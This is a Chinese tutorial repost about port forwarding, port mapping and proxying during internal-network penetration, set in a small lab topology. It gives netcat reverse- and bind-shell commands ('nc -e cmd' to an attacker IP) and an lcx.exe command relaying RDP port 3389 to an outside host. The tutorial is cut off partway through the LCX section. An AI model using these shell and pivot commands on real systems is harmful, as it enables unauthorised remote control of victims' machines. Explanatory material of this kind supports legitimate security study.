内网渗透之端口转发、映射、代理

这篇具有很好参考价值的文章主要介绍了内网渗透之端口转发、映射、代理。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

端口转发&端口映射

0x01 什么是端口转发

端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH)为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为,其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址(局域网内部)上的一个端口。

普通话:端口转发就是将一个端口,这个端口可以本机的端口也可以是本机可以访问到的任意主机的端口,转发到任意一台可以访问到的IP上,通常这个IP是公网ip

0x02 什么是端口映射

端口映射是NAT的一种,功能是把在公网的地址转翻译成私有地址,
采用路由方式的ADSL宽带路由器拥有一个动态或固定的公网IP,ADSL直接接在HUB或交换机上,所有的电脑共享上网。

普通话:就是映射端口,就是将一个内网端口映射到公网上的某个端口,假设我自己的电脑是在内网中,没有公网
IP,但是我想提供一个端口供其他人使用,这就是端口映射

0x03 区分端口映射和端口转发

端口映射场景:

外网主机A想访问内网主机B上的服务

端口转发场景:

外网主机A已经可以任意内网主机B上的端口,但是无法访问内网主机C上的端口

此时可以将C主机的端口到B主机的端口,那么外网主机A访问B主机的某某端口就相当于访问了C主机的某某

总结:

端口转发和端口映射原理是一样的只不过是应用场景不一样,假如我们将本机的端口转发到远程主机端口,我们可以叫端口映射,也可以叫端口转发,看下图【注意图上文字】

我们如果把本机可以访问到的任意 IP
的端口转发到另外一台服务器的端口,我们叫他端口转发,看下图【注意图上文字】

0x04 区分正向连接和反向连接

  • 正向连接:你的机器连接目标机器
  • 反向连接:目标机器反连你的机器
  • 不论映射,还是转发,都有正有反,原理相同

0x05 端口转发和代理工具

  • Lcx
  • Htran
  • Netcat

0x06 环境拓扑图


A 主机W7

B 主机W7

C 主机XP

0x07 NC

NC 用法

2. NC反向连接-网络环境设想:

A外网 无法访问 内网B 【A为攻击者处于外网】

B内网 可以访问 外网A

A:192.168.0.226

B:192.168.32.130

适合nc反向连接:也就将内网主机B shell反弹到 外网A

在外网主机A上执行:nc –nvlp 7777


在内网主机B上执行:nc –e cmd 192.168.0.226 7777


此处假装我连上了shell,并上传了nc


A主机处回显

3. NC正向连接-网络环境设想:

A内网 可以访问 外网B 【A为攻击者处于内网】

B外网 不能访问 内网A

适合nc正向连接:也就将内网主机A shell反弹到 外网B

在内网A 上执行 nc –l –p 5555 –e cmd .exe


在外网主机B上执行nc –nvv 192.168.0.226 5555

4. 阐述:

如果客户端【相当于内网】连接服务器【相当于外网】,想获取服务器的shell,那么称为正向shell,如果是客户端连接服务器,服务器端想获取客户端的shell,那么称为反向shell

NC是安全的瑞士军刀,太出名了,不光能反弹shell,端口转发,还能聊天等等

0x08 LCX

LCX用法:

LCX端口映射环境设想:

A外网 无法访问 内网B 【A为攻击者处于外网】

B内网 可以访问 外网A

在内网主机B上执行:lcx.exe –slave 192.168.0.226 7777 192.168.32.132 3389</文章来源地址https://www.toymoban.com/news/detail-720428.html

到了这里,关于内网渗透之端口转发、映射、代理的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • TPlink云路由器界面端口映射设置方法?快解析内网穿透能实现吗?

    有很多网友在问:TPlink路由器端口映射怎么设置?因为不懂端口映射的原理,所以无从下手,下面小编就给大家分享TPlink云路由器界面端口映射设置方法,帮助大家快速入门TP路由器端口映射设置方法。 1.登录路由器管理界面,点击:应用管理,进入应用中心,如下图所示:

    2024年02月14日
    浏览(58)
  • 端口映射和端口转发

    端口转发和端口映射都是为了解决内网主机的端口无法在外部直接访问而衍生出来的技术,通过中间服务器进行中转,将内部的端口映射到公网IP上或者将内部端口转发到外部服务器,供用户或者自己来使用,那么他们的区别是什么呢? 顾名思义,就是将端口进行转发,具体

    2024年02月15日
    浏览(101)
  • vscode 端口转发实现端口映射,实现端口自由

    用vscode连接server进行开发, 是非常方便的,但很多时候,server的端口开放的很有限,那么就可以利用vscode进行端口映射   举一个应用场景: 先通过A利用vscode 连接B,然后再vscode 的port窗口进行端口转发,比如将22端口映射到A本地的5000, 然后再通过Host利用vscode连接A,利用端

    2024年02月16日
    浏览(38)
  • 端口映射的作用?如何在路由器上做端口映射

    一、端口映射作用 路由器中设置端口映射的主要作用,就是让Internet上的其他用户,可以访问你路由器下面电脑中的数据(软件、文件)。 当家里的电脑使 用 路 由 器上网后,在Internet下的其它电脑 、 手机等网络设备,将无法自接访问你电脑中的数据。 如果你电脑中某个软件

    2024年02月10日
    浏览(45)
  • 教你如何在路由器上设置端口映射?开启路由器端口映射的教程

    路由器上设置端口映射相对于花生壳会更快更稳定,因为花生壳的映射原理属于转发的,就是所有的数据都要经过花生壳,这样无形中就浪费很多时间。现在来教你如何开启路由器上的端口映射。 1、首先你要有路由器完全权限的账户,如何获得,这里不阐述。可以自己去百

    2024年02月07日
    浏览(47)
  • 用Nginx做端口转发(反向代理)

    本文中,我们介绍Nginx如何做端口转发,还有各种转发规则 首先介绍最常用的,将域名转发到本地另一个端口上 这样访问 http://tomcat.shaochenfeng.com 时就会转发到本地的 8080 端口

    2024年02月14日
    浏览(43)
  • 路由器的端口映射能实现什么?

    路由器的 端口映射 是一项重要的网络配置功能,它可以帮助实现局域网内外的设备之间的通信。通过 端口映射 ,我们可以在公网上访问局域网内的设备,方便的进行 远程访问 、共享文件和资源等操作。 什么是 端口映射 ? 在介绍 端口映射 之前,先让我们了解一下网络中

    2024年03月20日
    浏览(45)
  • nginx 反向代理服务器端口转发问题

    先介绍一下项目背景,公司里有个外包Saas项目,这里假设为A项目( 前后端不分离 );项目架构大概如下;但是项目部署到生产环境时,那台服务器80端口被其他应用占用了(我尼玛...),nginx监听端口那边只能监听其他端口了,比如监听:18000,通过nginx反向代理将18000端口转发到

    2024年02月04日
    浏览(56)
  • 怎么解决多层路由器端口映射的问题?

    路由器的多层端口映射 1、、路由器A连接的猫,路由器B通过网络将路由器A的LAN口和路由器B的WAN口连接,T+服务器是通过路由器B的网线连接的。),应该怎么进行端口映射呢? 2、上图中路由器A为TPLINK无线路由器,为第一层,通过猫直接连接外网。路由器A的后台管理地址为:

    2024年02月08日
    浏览(40)
  • SSH隧道动态转发端口实现SOCKS代理 + HTTP代理(Privoxy)

    实现效果 :ssh连接远程服务器进行网络转发,本地服务连接网络代理 环境 :windows11/10 需要工具 :MobaXterm(ssh隧道端口转发),Privoxy(socks转http代理),一个云服务器 多种方法选一种即可:  命令行: ssh -C -N -D LOCAL_ADDRESS:LOCAL_PORT USER@REMOTE_ADDRESS Putty客户端 MobaXteam中的 Mo

    2023年04月09日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包